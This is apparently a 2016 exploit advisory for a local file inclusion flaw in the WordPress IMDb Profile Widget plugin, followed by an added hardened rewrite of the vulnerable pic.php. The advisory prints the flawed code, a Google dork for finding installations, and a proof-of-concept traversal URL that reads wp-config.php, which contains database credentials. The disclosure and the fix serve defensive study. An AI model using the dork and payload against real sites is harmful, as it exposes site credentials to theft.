# Exploit Title: WordPress Plugin IMDb Profile Widget - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-26
# Google Dork : inurl:/wp-content/plugins/imdb-widget
# Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
# Tested on: MSWin32
# Version: 1.0.8

# Vuln file : pic.php

<?php

header( 'Content-Type: image/jpeg' );
readfile( $_GET["url"] );

# PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
# Right click -> Save As -> rename pic.jpg to .txt and read the file

# 26/03/2016 - Informed Vendor about Issue
# 27/03/2016 - Waiting Reply
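
A hardened form of the pic.php handler shown above, as an added example (it is not the plugin's code and not the vendor's fix). It assumes the endpoint only needs to proxy remote JPEG images over HTTPS; `ALLOWED_HOSTS`, `MAX_BYTES` and `validate_image_url()` are hypothetical names, and the host in the list is a placeholder.

```php
<?php
// Added example: hardened replacement for the vulnerable pic.php handler.
// Assumption: the endpoint only needs to proxy remote JPEG images.
// ALLOWED_HOSTS is a placeholder list, not taken from the plugin.
const ALLOWED_HOSTS = ['images.example.com'];
const MAX_BYTES = 2 * 1024 * 1024;

function validate_image_url($raw): ?string
{
    if (!is_string($raw) || strlen($raw) > 2048) {
        return null;   // rejects array input (?url[]=) and oversized values
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;   // relative paths such as ../../../wp-config.php
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return null;   // blocks file://, php://, data:// and plain http
    }
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return null;   // no embedded credentials or alternate ports
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;   // exact-match host allowlist
    }
    return $raw;
}

$url = validate_image_url($_GET['url'] ?? null);
if ($url === null) {
    http_response_code(400);
    exit;
}

// Do not follow redirects: a redirect could leave the allowlisted host.
$ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
$body = @file_get_contents($url, false, $ctx, 0, MAX_BYTES);

// Verify the payload really is a JPEG before labelling it as one.
$info = ($body === false) ? false : @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
    http_response_code(502);
    exit;
}

header('Content-Type: image/jpeg');
header('X-Content-Type-Options: nosniff');
echo $body;
```

Fetching over HTTPS this way requires `allow_url_fopen` and the openssl extension. The JPEG check on the response body means that even a path that slipped past validation could not be returned as file contents under the image content type.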